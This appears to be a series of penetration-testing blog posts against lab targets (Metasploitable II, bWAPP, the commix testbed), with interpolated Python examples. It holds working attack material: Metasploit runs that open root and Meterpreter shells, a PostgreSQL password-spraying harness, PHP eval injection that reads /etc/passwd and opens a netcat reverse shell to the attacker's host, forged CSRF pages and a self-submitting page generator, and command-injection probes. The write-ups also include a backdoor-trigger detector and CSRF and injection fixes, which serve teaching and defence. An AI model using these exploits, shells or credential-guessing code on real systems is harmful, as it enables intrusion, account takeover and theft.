Tuesday, February 18, 2020

Metasploitable II: Unreal IRCD exploit

Metasploitable II runs a backdoored UnrealIRCd 3.2.8.1 server on TCP port 6667 (the module name and the default RPORT below give both away). Our goal is to exploit the backdoor and get shell access on the remote system. Our first task is to select the module we will use against the host.

msf5 > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT   6667             yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target


msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > run

[*] Started reverse TCP double handler on 192.168.56.1:4444 
[*] 192.168.56.101:6667 - Connected to 192.168.56.101:6667...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] 192.168.56.101:6667 - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo vcxINITmV5eNOXnX;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "vcxINITmV5eNOXnX\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.56.1:4444 -> 192.168.56.101:35054) at 2020-02-18 14:02:05 -0700

id
uid=0(root) gid=0(root)
whoami
root

As you can see we got a shell on the host, and it is already root: the backdoor runs its command as the user that started the IRC daemon, which on Metasploitable II is root, so no privilege escalation step is needed.
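
The detection side of this, as an added example that is not part of the original post: the trojaned UnrealIRCd 3.2.8.1 tarball (CVE-2010-2075) passed any client line whose first two bytes were "AB" straight to system(), and the Metasploit module used above sends "AB;" followed by its command. The script below classifies client-to-server IRC lines and flags that trigger; the command allowlist and the sample session are constructed for the demo.

```python
# Added example (not from the original post): flag the UnrealIRCd 3.2.8.1
# backdoor trigger in client-to-server IRC traffic. The trojaned tarball
# (CVE-2010-2075) passed any client line beginning with "AB" to system();
# the Metasploit module sends "AB;" + command.
import re

BACKDOOR_PREFIX = "AB"

# Commands a client legitimately sends. An allowlist for the demo, not an
# exhaustive RFC 1459 list; extend as needed (assumption).
KNOWN_CLIENT_COMMANDS = {
    "PASS", "NICK", "USER", "PING", "PONG", "JOIN", "PART", "PRIVMSG",
    "NOTICE", "QUIT", "MODE", "TOPIC", "NAMES", "LIST", "WHO", "WHOIS",
    "CAP", "AUTHENTICATE", "OPER", "KICK", "INVITE", "AWAY", "MOTD", "LUSERS",
}

def classify_client_line(line: str) -> str:
    """Return 'backdoor', 'unknown' or 'ok' for one line sent by an IRC client."""
    line = line.rstrip("\r\n")
    if not line:
        return "ok"
    # The backdoor checked only the first two bytes of the read buffer,
    # so "AB;id", "ABC" and "AB" alone all reached system().
    if line.startswith(BACKDOOR_PREFIX):
        return "backdoor"
    # Optional ":source " prefix, then the command verb or a numeric.
    m = re.match(r"^(?::\S+\s+)?([A-Za-z]+|\d{3})", line)
    if m and m.group(1).upper() in KNOWN_CLIENT_COMMANDS:
        return "ok"
    return "unknown"

def scan_session(lines):
    """Return (line_number, verdict, text) for every line that is not plain IRC."""
    findings = []
    for n, text in enumerate(lines, 1):
        verdict = classify_client_line(text)
        if verdict != "ok":
            findings.append((n, verdict, text.rstrip("\r\n")))
    return findings

# Constructed sample of client lines; server->client greetings are not scanned.
SAMPLE_CLIENT_LINES = [
    "NICK probe\r\n",
    "USER probe 0 * :probe\r\n",
    "AB;echo vcxINITmV5eNOXnX;\r\n",     # the backdoor trigger plus a command
    "PRIVMSG #chan :hello\r\n",
]

if __name__ == "__main__":
    for n, verdict, text in scan_session(SAMPLE_CLIENT_LINES):
        print(f"line {n}: {verdict}: {text!r}")
```

Feeding this the client side of a captured session (for example the payload of each TCP segment to port 6667) turns the exploit above into a one-line alert; a legitimate client has no reason to send a line starting with "AB".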

Saturday, February 15, 2020

Metasploitable II: POSTGRES SQL Server

Metasploitable II also runs a PostgreSQL server on TCP port 5432. Our goal is a two-step attack: first brute force a valid login, then use that login to gain shell access on the remote host.

We can use the postgres_login module to brute force a valid login for the PostgreSQL server.

msf5 > use auxiliary/scanner/postgres/postgres_login 
msf5 auxiliary(scanner/postgres/postgres_login) > show options

Module options (auxiliary/scanner/postgres/postgres_login):

   Name              Current Setting                                                              Required  Description
   ----              ---------------                                                              --------  -----------
   BLANK_PASSWORDS   false                                                                        no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                                                            yes       How fast to bruteforce, from 0 to 5
   DATABASE          template1                                                                    yes       The database to authenticate against
   DB_ALL_CREDS      false                                                                        no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                                                        no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                                                        no        Add all users in the current database to the list
   PASSWORD                                                                                       no        A specific password to authenticate with
   PASS_FILE         /home/sam/metasploit-framework/data/wordlists/postgres_default_pass.txt      no        File containing passwords, one per line
   Proxies                                                                                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RETURN_ROWSET     true                                                                         no        Set to true to see query result sets
   RHOSTS                                                                                         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT             5432                                                                         yes       The target port
   STOP_ON_SUCCESS   false                                                                        yes       Stop guessing when a credential works for a host
   THREADS           1                                                                            yes       The number of concurrent threads (max one per host)
   USERNAME                                                                                       no        A specific username to authenticate as
   USERPASS_FILE     /home/sam/metasploit-framework/data/wordlists/postgres_default_userpass.txt  no        File containing (space-separated) users and passwords, one pair per line
   USER_AS_PASS      false                                                                        no        Try the username as the password for all users
   USER_FILE         /home/sam/metasploit-framework/data/wordlists/postgres_default_user.txt      no        File containing users, one per line
   VERBOSE           true                                                                         yes       Whether to print output for all attempts

msf5 auxiliary(scanner/postgres/postgres_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf5 auxiliary(scanner/postgres/postgres_login) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf5 auxiliary(scanner/postgres/postgres_login) > run

[!] No active DB -- Credential data will not be saved!
[-] 192.168.56.101:5432 - LOGIN FAILED: :@template1 (Incorrect: Invalid username or password)
[-] 192.168.56.101:5432 - LOGIN FAILED: :tiger@template1 (Incorrect: Invalid username or password)
[-] 192.168.56.101:5432 - LOGIN FAILED: :postgres@template1 (Incorrect: Invalid username or password)
[-] 192.168.56.101:5432 - LOGIN FAILED: :password@template1 (Incorrect: Invalid username or password)
[-] 192.168.56.101:5432 - LOGIN FAILED: :admin@template1 (Incorrect: Invalid username or password)
[-] 192.168.56.101:5432 - LOGIN FAILED: postgres:@template1 (Incorrect: Invalid username or password)
[-] 192.168.56.101:5432 - LOGIN FAILED: postgres:tiger@template1 (Incorrect: Invalid username or password)
[+] 192.168.56.101:5432 - Login Successful: postgres:postgres@template1
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/postgres/postgres_login) > 

As you can see we found a valid login for the PostgreSQL server: postgres:postgres, the default credentials. Now it's time to turn that login into a system shell. For this we are going to use the postgres_payload module of the Metasploit framework. It uses the database login to upload a shared object and load it as a user-defined function, which is why it needs a superuser role such as postgres; the payload then runs as the operating-system user the database runs under.

msf5 > use exploit/linux/postgres/postgres_payload 
msf5 exploit(linux/postgres/postgres_payload) > show options

Module options (exploit/linux/postgres/postgres_payload):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DATABASE  template1        yes       The database to authenticate against
   PASSWORD  postgres         no        The password for the specified username. Leave blank for a random password.
   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT     5432             yes       The target port
   USERNAME  postgres         yes       The username to authenticate as
   VERBOSE   false            no        Enable verbose output


Exploit target:

   Id  Name
   --  ----
   0   Linux x86


msf5 exploit(linux/postgres/postgres_payload) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf5 exploit(linux/postgres/postgres_payload) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] 192.168.56.101:5432 - PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)
[*] Uploaded as /tmp/JAkIxpbf.so, should be cleaned up automatically
[*] Sending stage (985320 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:47858) at 2020-02-15 11:27:10 -0700

meterpreter > shell
Process 4825 created.
Channel 1 created.
id
uid=108(postgres) gid=117(postgres) groups=114(ssl-cert),117(postgres)
python -c 'import pty;pty.spawn("/bin/bash")'
postgres@metasploitable:~/8.3/main$ pwd
pwd
/var/lib/postgresql/8.3/main
postgres@metasploitable:~/8.3/main$ 

As you can see we successfully got a shell back from the payload. Note that it runs as the postgres OS user (uid 108), not root, so unlike the IRC backdoor a separate privilege escalation step would be needed for full control of the host.
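
What postgres_login does internally, as an added example that is not part of the original post: a small credential-guessing harness with the same knobs as the module (USERPASS_FILE, BLANK_PASSWORDS, USER_AS_PASS, STOP_ON_SUCCESS). The network step is a pluggable function so the candidate generation can be exercised offline against a stand-in that only accepts postgres:postgres; psycopg2_login() wires it to a real server when psycopg2 is installed (that package, and the sample wordlist, are the assumptions here).

```python
# Added example (not from the original post): credential guessing with the
# same options as Metasploit's postgres_login, network part pluggable.

def parse_userpass(text):
    """Parse 'user password' pairs, one per line (the layout of the Metasploit
    postgres_default_userpass.txt file). A line with only a user means blank password."""
    pairs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        user, _, password = line.partition(" ")
        pairs.append((user, password.strip()))
    return pairs

def candidate_credentials(userpass_pairs, users=(), passwords=(),
                          blank_passwords=False, user_as_pass=False):
    """Ordered, de-duplicated (user, password) guesses: known pairs first."""
    seen, ordered = set(), []

    def add(u, p):
        if (u, p) not in seen:
            seen.add((u, p))
            ordered.append((u, p))

    for u, p in userpass_pairs:
        add(u, p)
    all_users = list(dict.fromkeys([u for u, _ in userpass_pairs] + list(users)))
    for u in all_users:
        if blank_passwords:
            add(u, "")
        if user_as_pass:
            add(u, u)
        for p in passwords:
            add(u, p)
    return ordered

def spray(try_login, creds, stop_on_success=True):
    """Try each credential in order; return the list that worked."""
    found = []
    for u, p in creds:
        if try_login(u, p):
            found.append((u, p))
            if stop_on_success:
                break
    return found

def psycopg2_login(host, port=5432, database="template1"):
    """Return a try_login(user, password) that talks to a real PostgreSQL server."""
    import psycopg2  # assumption: pip install psycopg2-binary

    def try_login(user, password):
        try:
            conn = psycopg2.connect(host=host, port=port, dbname=database,
                                    user=user, password=password,
                                    connect_timeout=5)
            conn.close()
            return True
        except psycopg2.OperationalError:   # bad password, unknown role, pg_hba reject
            return False
    return try_login

# Constructed sample wordlist in the same layout as the Metasploit file.
SAMPLE_USERPASS = """\
postgres tiger
postgres postgres
admin password
"""

def demo_offline():
    """Stand-in server that, like Metasploitable II, accepts only postgres:postgres."""
    valid = {("postgres", "postgres")}
    creds = candidate_credentials(parse_userpass(SAMPLE_USERPASS),
                                  passwords=["password", "admin"],
                                  blank_passwords=True, user_as_pass=True)
    return spray(lambda u, p: (u, p) in valid, creds)

if __name__ == "__main__":
    print(demo_offline())
```

Once a login works, the precondition for postgres_payload is that the role is a superuser; `SELECT rolsuper FROM pg_roles WHERE rolname = current_user;` returning true is the check to run before reaching for that module.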

Thursday, February 13, 2020

bWAPP PHP Eval Function

First we need to test the eval parameter to see if it is indeed passed to PHP's eval(). A harmless marker is enough:

http://192.168.56.101/bWAPP/php_eval.php?eval=echo "TeStVUln";

Since the marker came back, we know the parameter is evaluated as PHP code, so we can run system commands with PHP's shell_exec() function.

http://192.168.56.101/bWAPP/php_eval.php?eval=echo shell_exec("id");

We get back the output of id for the user the web server runs as.

http://192.168.56.101/bWAPP/php_eval.php?eval=echo shell_exec("cat /etc/passwd");

Here we dumped the contents of /etc/passwd. Our next task is to get a connect-back shell to our local box.

http://192.168.56.101/bWAPP/php_eval.php?eval=echo shell_exec("nc -e /bin/sh 192.168.56.1 8088");

We send the command with a netcat listener already waiting on our box, and get a connect-back shell:

sam@ubuntu:~/pentest$ nc -lvp 8088
Listening on [0.0.0.0] (family 0, port 8088)
Connection from 192.168.56.101 34263 received!
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@bee-box:/var/www/bWAPP$ id;whoami
id;whoami
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data
www-data@bee-box:/var/www/bWAPP$ 

bWAPP CSRF

CSRF (Change Password)

The first challenge is the change-password CSRF. Our goal is to change the user's password without ever logging in ourselves: the victim's browser, which already holds a valid bWAPP session cookie, sends the request for us.

<html>
<body>
<form action="http://192.168.56.101/bWAPP/csrf_1.php">
<input type="hidden" name="password_new" value="abc" />
<input type="hidden" name="password_conf" value="abc" />
<input type="hidden" name="action" value="change" />
<input type="submit" value="Submit Request" />
</form>
</body>
</html>

First we create a page with all the needed parameters as hidden fields and a submit button. Because the form has no method attribute it submits via GET, which is the same request the real change-password form sends. All that's left is to click the button from a browser that is logged in to bWAPP and check the page status.

As you can see we successfully changed the password from our own page: nothing ties the request to the page that was supposed to send it, no token and no origin check.

CSRF (Transfer Amount)

Next up is the transfer-amount CSRF. This page transfers an amount to a given account number. If we set the account and amount parameters in our own page and have the logged-in browser submit them, the transfer should go through.

<html>
<body>
<form action="http://192.168.56.101/bWAPP/csrf_2.php" method="GET">
<input type="hidden" name="account" value="123-45678-90" />
<input type="hidden" name="amount" value="100" />
<input type="hidden" name="action" value="transfer" />
<input type="submit" name="submit" value="Submit Request" />
</form>
</body>
</html>

With the page set up, all that's left is to submit the request.

As you can see, after submitting the request the balance is 800 euros instead of the 900 it was before, so the forged transfer of 100 went through.

CSRF (Change Secret)

This one is the change-secret CSRF. Like before we construct a page with the needed parameters and a submit button. This form uses POST, which makes no difference to the attack: a cross-site form can POST just as easily as it can GET.

<html>
<body>
<form action="http://192.168.56.101/bWAPP/csrf_3.php" method="POST">
<input type="hidden" name="secret" value="1234" />
<input type="hidden" name="login" value="xyz" />
<input type="hidden" name="action" value="change" />
<input type="submit" value="Submit Request" />
</form>
</body>
</html>

With the page set up, let's submit the request and see what we get on the other end.

As you can see we successfully changed the user's secret.
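
Two things worth seeing beside the three hand-written pages above, as an added example that is not part of the original post or of bWAPP: the attacker side automated (a self-submitting page built from a dict of parameters, so the victim only has to load it; for the two GET forms an `<img src="...csrf_1.php?password_new=abc&...">` tag would do the same with no form at all), and the server-side check that would have stopped each request: a per-session synchronizer token compared in constant time, plus an Origin check. The session store, the request shape and the function names are assumptions for the demo.

```python
# Added example (not from the original post, not bWAPP's code): CSRF attack
# page generator and the hardened handler that defeats it.
import hmac
import html
import secrets
from urllib.parse import urlsplit

def csrf_page(action, params, method="POST"):
    """Render a self-submitting form: the victim only has to load the page."""
    fields = "\n".join(
        f'<input type="hidden" name="{html.escape(k)}" value="{html.escape(v)}" />'
        for k, v in params.items())
    return (f'<html><body onload="document.forms[0].submit()">\n'
            f'<form action="{html.escape(action)}" method="{method}">\n'
            f"{fields}\n</form></body></html>")

def issue_token(session):
    """Put a fresh random token in the server-side session; the real form embeds it."""
    session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]

def same_origin(headers, site):
    """Compare Origin (Referer as fallback) against the site's own origin."""
    src = headers.get("Origin") or headers.get("Referer")
    if not src:
        return False
    o, s = urlsplit(src), urlsplit(site)
    return (o.scheme, o.hostname, o.port) == (s.scheme, s.hostname, s.port)

def handle_change_password(request, session, site="http://192.168.56.101"):
    """Hardened version of what csrf_1.php does.
    request = {'form': {...}, 'headers': {...}}; returns (status, message)."""
    form, headers = request["form"], request["headers"]
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token", "")
    # Constant-time compare: a plain == would leak the token byte by byte.
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return 403, "bad or missing CSRF token"
    if not same_origin(headers, site):
        return 403, "cross-origin request refused"
    if form.get("password_new") != form.get("password_conf"):
        return 400, "passwords do not match"
    session["password"] = form["password_new"]
    return 200, "password changed"

if __name__ == "__main__":
    print(csrf_page("http://192.168.56.101/bWAPP/csrf_3.php",
                    {"secret": "1234", "login": "xyz", "action": "change"}))
```

The forged page never sees the token because it lives in the victim's session and in a page served to the victim only, and the SameSite cookie attribute (Lax or Strict) on the session cookie adds a browser-side layer on top of this check.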

Commix Injection Tool

Commix is a tool for detecting and exploiting OS command injection vulnerabilities in web applications. Today we will go through some of its options and show examples of how they work, using the commix testbed running on the local machine.

Retrieve current user name

Our first task is to enumerate the user the web application runs as. For that we use the --current-user option together with the URL to test. Commix first confirms that the parameter is injectable (note the payload it prints) and only then runs its enumeration command through it.

python commix.py --url="http://localhost/cmd.php?addr=127.0.0.1" --current-user
sam@ubuntu:~/pentest/commix$ python commix.py --url="http://127.0.0.1/~sam/commix-testbed/scenarios/regular/GET/classic.php?addr=127.0.0.1" --current-user
                                      __           
   ___   ___     ___ ___     ___ ___ /\_\   __  _   
 /`___\ / __`\ /' __` __`\ /' __` __`\/\ \ /\ \/'\  v3.1-dev#11
/\ \__//\ \/\ \/\ \/\ \/\ \/\ \/\ \/\ \ \ \\/>   y
[+] The GET parameter 'addr' seems injectable via (results-based) classic command injection technique.
    [~] Payload: ;echo BCWTSZ$((34+37))$(echo BCWTSZ)BCWTSZ
[+] The current user is www-data.
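
What that "results-based classic" check does, as an added example that is not part of the original post or of commix: inject a tag, an arithmetic expression and a sub-shell, then look for tag + result + tag + tag in the response. Below it runs against a deliberately vulnerable handler that mirrors the testbed's classic.php (user input concatenated into a shell string) and two fixed versions. The handlers echo instead of pinging so the demo is self-contained; the function names are assumptions.

```python
# Added example (not from the original post, not commix's code): results-based
# command injection detection, plus vulnerable and fixed handlers to run it on.
import ipaddress
import secrets
import subprocess

def build_probe(tag, a=34, b=37, separator=";"):
    """Payload in the shape commix printed: ;echo TAG$((a+b))$(echo TAG)TAG"""
    payload = f"{separator}echo {tag}$(({a}+{b}))$(echo {tag}){tag}"
    expected = f"{tag}{a + b}{tag}{tag}"
    return payload, expected

def is_injectable(send, base_value="127.0.0.1"):
    """send(value) -> response body. True when the evaluated arithmetic comes back."""
    tag = secrets.token_hex(4).upper()       # random tag: no false hit on cached pages
    payload, expected = build_probe(tag)
    return expected in send(base_value + payload)

# --- stand-ins for the web application ------------------------------------
def vulnerable_handler(addr):
    """Like classic.php: the parameter is spliced into a shell command line."""
    cmd = "echo pinging " + addr            # real testbed runs ping; echo keeps this offline
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout

def fixed_handler(addr):
    """Argument list and no shell: the whole value is a single argv element."""
    return subprocess.run(["echo", "pinging", addr],
                          capture_output=True, text=True).stdout

def validated_handler(addr):
    """Allowlist first: anything that is not an IP literal never reaches a process."""
    try:
        ipaddress.ip_address(addr)
    except ValueError:
        return "invalid address"
    return fixed_handler(addr)

if __name__ == "__main__":
    print("vulnerable:", is_injectable(vulnerable_handler))   # True
    print("fixed:     ", is_injectable(fixed_handler))        # False
    print("validated: ", is_injectable(validated_handler))    # False
```

The `$((34+37))` and `$(echo TAG)` pieces matter: a page that merely reflects the input would contain the tag but not the computed 71, so the check only fires when a shell actually evaluated the string.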

Retrieve current hostname

python commix.py --url="http://localhost/cmd.php?addr=127.0.0.1" --hostname

You can retrieve the hostname with commix by simply adding the --hostname option to the command line.

sam@ubuntu:~/pentest/commix$ python commix.py --url="http://127.0.0.1/~sam/commix-testbed/scenarios/regular/GET/classic.php?addr=127.0.0.1" --hostname
[+] The GET parameter 'addr' seems injectable via (results-based) classic command injection technique.
    [~] Payload: ;echo BCWTSZ$((34+37))$(echo BCWTSZ)BCWTSZ
[+] The hostname is ubuntu.

Check if the current user has root privileges

python commix.py --url="http://localhost/cmd.php?addr=127.0.0.1" --is-root

To check if the current user has root privileges you can use the --is-root option.

sam@ubuntu:~/pentest/commix$ python commix.py --url="http://127.0.0.1/~sam/commix-testbed/scenarios/regular/GET/classic.php?addr=127.0.0.1" --is-root
[+] The GET parameter 'addr' seems injectable via (results-based) classic command injection technique.
    [~] Payload: ;echo BCWTSZ$((34+37))$(echo BCWTSZ)BCWTSZ
[+] The current user is www-data and it is not privileged.

Check if the current user has admin privileges

python commix.py --url="http://localhost/cmd.php?addr=127.0.0.1" --is-admin

To check if the current user has admin privileges use the --is-admin option. On a Linux target it reports the same result as --is-root, as the output below shows.

sam@ubuntu:~/pentest/commix$ python commix.py --url="http://127.0.0.1/~sam/commix-testbed/scenarios/regular/GET/classic.php?addr=127.0.0.1" --is-admin
[+] The GET parameter 'addr' seems injectable via (results-based) classic command injection technique.
    [~] Payload: ;echo BCWTSZ$((34+37))$(echo BCWTSZ)BCWTSZ
[+] The current user is www-data and it is not privileged.

Retrieve system information

python commix.py --url="http://localhost/cmd.php?addr=127.0.0.1" --sys-info

To retrieve system information about the remote host use the --sys-info option.

sam@ubuntu:~/pentest/commix$ python commix.py --url="http://127.0.0.1/~sam/commix-testbed/scenarios/regular/GET/classic.php?addr=127.0.0.1" --sys-info
[+] The GET parameter 'addr' seems injectable via (results-based) classic command injection technique.
    [~] Payload: ;echo BCWTSZ$((34+37))$(echo BCWTSZ)BCWTSZ
[+] The target operating system is Linux (Ubuntu 18.04) and the hardware platform is x86_64.

Retrieve system users

python commix.py --url="http://localhost/cmd.php?addr=127.0.0.1" --users

To list all system users on the remote host use the --users option, which reads and parses /etc/passwd through the injection.

sam@ubuntu:~/pentest/commix$ python commix.py --url="http://127.0.0.1/~sam/commix-testbed/scenarios/regular/GET/classic.php?addr=127.0.0.1" --users
[+] The GET parameter 'addr' seems injectable via (results-based) classic command injection technique.
    [~] Payload: ;echo BCWTSZ$((34+37))$(echo BCWTSZ)BCWTSZ
[*] Fetching '/etc/passwd' to enumerate users entries... [ SUCCEED ]
[+] Identified 41 entries in '/etc/passwd'.
    (1) 'root'(uid=0). Home directory is in '/root'.
    (2) 'daemon'(uid=1). Home directory is in '/usr/sbin'.
    (3) 'bin'(uid=2). Home directory is in '/bin'.
    (4) 'sys'(uid=3). Home directory is in '/dev'.
    (5) 'sync'(uid=4). Home directory is in '/bin'.
    (6) 'games'(uid=5). Home directory is in '/usr/games'.
    (7) 'man'(uid=6). Home directory is in '/var/cache/man'.
    (8) 'lp'(uid=7). Home directory is in '/var/spool/lpd'.
    (9) 'mail'(uid=8). Home directory is in '/var/mail'.
    (10) 'news'(uid=9). Home directory is in '/var/spool/news'.
    (11) 'uucp'(uid=10). Home directory is in '/var/spool/uucp'.
    (12) 'proxy'(uid=13). Home directory is in '/bin'.
    (13) 'www-data'(uid=33). Home directory is in '/var/www'.
    (14) 'backup'(uid=34). Home directory is in '/var/backups'.
    (15) 'list'(uid=38). Home directory is in '/var/list'.
    (16) 'irc'(uid=39). Home directory is in '/var/run/ircd'.
    (17) 'gnats'(uid=41). Home directory is in '/var/lib/gnats'.
    (18) 'nobody'(uid=65534). Home directory is in '/nonexistent'.
    (19) 'systemd-network'(uid=100). Home directory is in '/run/systemd/netif'.
    (20) 'systemd-resolve'(uid=101). Home directory is in '/run/systemd/resolve'.
    (21) 'syslog'(uid=102). Home directory is in '/home/syslog'.
    (22) 'messagebus'(uid=103). Home directory is in '/nonexistent'.
    (23) '_apt'(uid=104). Home directory is in '/nonexistent'.
    (24) 'uuidd'(uid=105). Home directory is in '/run/uuidd'.
    (25) 'avahi-autoipd'(uid=106). Home directory is in '/var/lib/avahi-autoipd'.
    (26) 'usbmux'(uid=107). Home directory is in '/var/lib/usbmux'.
    (27) 'dnsmasq'(uid=108). Home directory is in '/var/lib/misc'.
    (28) 'rtkit'(uid=109). Home directory is in '/proc'.
    (29) 'lightdm'(uid=110). Home directory is in '/var/lib/lightdm'.
    (30) 'speech-dispatcher'(uid=111). Home directory is in '/var/run/speech-dispatcher'.
    (31) 'whoopsie'(uid=112). Home directory is in '/nonexistent'.
    (32) 'kernoops'(uid=113). Home directory is in '/'.
    (33) 'saned'(uid=114). Home directory is in '/var/lib/saned'.
    (34) 'pulse'(uid=115). Home directory is in '/var/run/pulse'.
    (35) 'avahi'(uid=116). Home directory is in '/var/run/avahi-daemon'.
    (36) 'colord'(uid=117). Home directory is in '/var/lib/colord'.
    (37) 'hplip'(uid=118). Home directory is in '/var/run/hplip'.
    (38) 'sam'(uid=1000). Home directory is in '/home/sam'.
    (39) 'cups-pk-helper'(uid=119). Home directory is in '/home/cups-pk-helper'.
    (40) 'mysql'(uid=120). Home directory is in '/nonexistent'.
    (41) 'postgres'(uid=121). Home directory is in '/var/lib/postgresql'.

Retrieve system users password hashes

python commix.py --url="http://localhost/cmd.php?addr=127.0.0.1" --passwords

To try to retrieve the users' password hashes use the --passwords option. This needs read access to /etc/shadow, which www-data does not have, so it fails here:

sam@ubuntu:~/pentest/commix$ python commix.py --url="http://127.0.0.1/~sam/commix-testbed/scenarios/regular/GET/classic.php?addr=127.0.0.1" --passwords
[+] The GET parameter 'addr' seems injectable via (results-based) classic command injection technique.
    [~] Payload: ;echo BCWTSZ$((34+37))$(echo BCWTSZ)BCWTSZ
[*] Fetching '/etc/shadow' to enumerate users password hashes... [ FAILED ]
[!] Warning: It seems that you don't have permissions to read '/etc/shadow' to enumerate users password hashes.

Retrieve system users privileges

python commix.py --url="http://localhost/cmd.php?addr=127.0.0.1" --privileges

To get a list of user privileges on the system use the --privileges option. In this run commix printed nothing for it and went straight to offering its pseudo-terminal shell:

sam@ubuntu:~/pentest/commix$ python commix.py --url="http://127.0.0.1/~sam/commix-testbed/scenarios/regular/GET/classic.php?addr=127.0.0.1" --privileges
[+] The GET parameter 'addr' seems injectable via (results-based) classic command injection technique.
    [~] Payload: ;echo BCWTSZ$((34+37))$(echo BCWTSZ)BCWTSZ

[?] Do you want a Pseudo-Terminal shell? [Y/n] > 

Retrieve everything

python commix.py --url="http://localhost/cmd.php?addr=127.0.0.1" --all

To run all of the enumeration options at once use the --all option.

sam@ubuntu:~/pentest/commix$ python commix.py --url="http://127.0.0.1/~sam/commix-testbed/scenarios/regular/GET/classic.php?addr=127.0.0.1" --all
[+] The GET parameter 'addr' seems injectable via (results-based) classic command injection technique.
    [~] Payload: ;echo BCWTSZ$((34+37))$(echo BCWTSZ)BCWTSZ
[+] The hostname is ubuntu.
[+] The current user is www-data and it is not privileged.
[+] The target operating system is Linux (Ubuntu 18.04) and the hardware platform is x86_64.
[*] Fetching '/etc/passwd' to enumerate users entries... [ SUCCEED ]
[+] Identified 41 entries in '/etc/passwd'.
    (1) 'root' is root user (uid=0). Home directory is in '/root'.
    (2) 'daemon' is system user (uid=1). Home directory is in '/usr/sbin'.
    (3) 'bin' is system user (uid=2). Home directory is in '/bin'.
    (4) 'sys' is system user (uid=3). Home directory is in '/dev'.
    (5) 'sync' is system user (uid=4). Home directory is in '/bin'.
    (6) 'games' is system user (uid=5). Home directory is in '/usr/games'.
    (7) 'man' is system user (uid=6). Home directory is in '/var/cache/man'.
    (8) 'lp' is system user (uid=7). Home directory is in '/var/spool/lpd'.
    (9) 'mail' is system user (uid=8). Home directory is in '/var/mail'.
    (10) 'news' is system user (uid=9). Home directory is in '/var/spool/news'.
    (11) 'uucp' is system user (uid=10). Home directory is in '/var/spool/uucp'.
    (12) 'proxy' is system user (uid=13). Home directory is in '/bin'.
    (13) 'www-data' is system user (uid=33). Home directory is in '/var/www'.
    (14) 'backup' is system user (uid=34). Home directory is in '/var/backups'.
    (15) 'list' is system user (uid=38). Home directory is in '/var/list'.
    (16) 'irc' is system user (uid=39). Home directory is in '/var/run/ircd'.
    (17) 'gnats' is system user (uid=41). Home directory is in '/var/lib/gnats'.
    (18) 'nobody'(uid=65534). Home directory is in '/nonexistent'.
    (19) 'systemd-network' is regular user (uid=100). Home directory is in '/run/systemd/netif'.
    (20) 'systemd-resolve' is regular user (uid=101). Home directory is in '/run/systemd/resolve'.
    (21) 'syslog' is regular user (uid=102). Home directory is in '/home/syslog'.
    (22) 'messagebus' is regular user (uid=103). Home directory is in '/nonexistent'.
    (23) '_apt' is regular user (uid=104). Home directory is in '/nonexistent'.
    (24) 'uuidd' is regular user (uid=105). Home directory is in '/run/uuidd'.
    (25) 'avahi-autoipd' is regular user (uid=106). Home directory is in '/var/lib/avahi-autoipd'.
    (26) 'usbmux' is regular user (uid=107). Home directory is in '/var/lib/usbmux'.
    (27) 'dnsmasq' is regular user (uid=108). Home directory is in '/var/lib/misc'.
    (28) 'rtkit' is regular user (uid=109). Home directory is in '/proc'.
    (29) 'lightdm' is regular user (uid=110). Home directory is in '/var/lib/lightdm'.
    (30) 'speech-dispatcher' is regular user (uid=111). Home directory is in '/var/run/speech-dispatcher'.
    (31) 'whoopsie' is regular user (uid=112). Home directory is in '/nonexistent'.
    (32) 'kernoops' is regular user (uid=113). Home directory is in '/'.
    (33) 'saned' is regular user (uid=114). Home directory is in '/var/lib/saned'.
    (34) 'pulse' is regular user (uid=115). Home directory is in '/var/run/pulse'.
    (35) 'avahi' is regular user (uid=116). Home directory is in '/var/run/avahi-daemon'.
    (36) 'colord' is regular user (uid=117). Home directory is in '/var/lib/colord'.
    (37) 'hplip' is regular user (uid=118). Home directory is in '/var/run/hplip'.
    (38) 'sam' is regular user (uid=1000). Home directory is in '/home/sam'.
    (39) 'cups-pk-helper' is regular user (uid=119). Home directory is in '/home/cups-pk-helper'.
    (40) 'mysql' is regular user (uid=120). Home directory is in '/nonexistent'.
